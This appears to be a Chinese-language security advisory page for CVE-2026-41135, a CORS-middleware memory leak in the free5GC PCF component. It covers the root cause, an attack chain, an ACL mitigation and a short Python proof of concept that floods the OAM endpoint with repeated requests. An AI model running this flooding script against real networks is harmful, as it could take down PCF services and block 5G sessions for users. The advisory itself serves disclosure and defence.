CVE-2026-41135 CVSS 7.5 高危

CVE-2026-41135 free5GC内存泄漏致拒绝服务漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41135

漏洞类型

内存泄漏

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

free5GC PCF

漏洞概述

free5GC PCF组件在1.4.3版本前存在内存泄漏漏洞。未认证攻击者可利用OAM端点逻辑缺陷，通过发送重复HTTP请求导致CORS中间件无限累积，耗尽系统内存资源，最终引发拒绝服务，阻断5G会话建立。

技术细节

该漏洞根因在于free5GC PCF组件在处理OAM端点请求时，错误地在HTTP处理函数内部调用了`router.Use()`。此调用会为每一个传入的请求在Gin路由器中注册一个新的CORS中间件，且这些中间件在请求结束后未被移除，导致处理程序链持续累积。攻击者无需认证，仅需访问网络即可利用该漏洞。通过向受影响接口发送大量重复的HTTP请求，可触发内存无限增长，直至系统资源耗尽，造成PCF服务拒绝服务。这将导致所有用户设备（UE）无法获得接入管理（AM）和会话管理（SM）策略，彻底阻断5G会话建立。此问题在1.4.3版本中已通过移除错误的中间件注册调用得到修复。

攻击链分析

STEP 1

侦察

攻击者识别网络中暴露的free5GC PCF组件及其OAM接口地址。

STEP 2

漏洞利用

攻击者向OAM端点发送大量重复的HTTP请求。

STEP 3

资源耗尽

由于每次请求都会注册新的CORS中间件，服务器内存持续增长，最终导致内存耗尽。

STEP 4

拒绝服务

PCF服务崩溃，导致所有UE无法获取策略，5G会话建立失败。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# PoC for CVE-2026-41135
# Target: free5GC PCF OAM endpoint
# Description: Sends repeated HTTP requests to trigger memory leak via CORS middleware accumulation.

target_url = "http://<TARGET_IP>:<PORT>/oam" # Replace with actual OAM endpoint

def exploit():
    print(f"Starting attack on {target_url}...")
    try:
        while True:
            # Send repeated HTTP requests
            response = requests.get(target_url, timeout=5)
            print(f"Sent request. Status: {response.status_code}")
            time.sleep(0.1) # Adjust frequency as needed
    except KeyboardInterrupt:
        print("Attack stopped by user.")
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    exploit()

影响范围

free5GC PCF < 1.4.3

防御指南

临时缓解措施

建议立即在防火墙或安全组中配置访问控制列表（ACL），仅允许受信任的管理IP地址访问PCF的OAM接口，防止未授权的外部攻击者触发漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表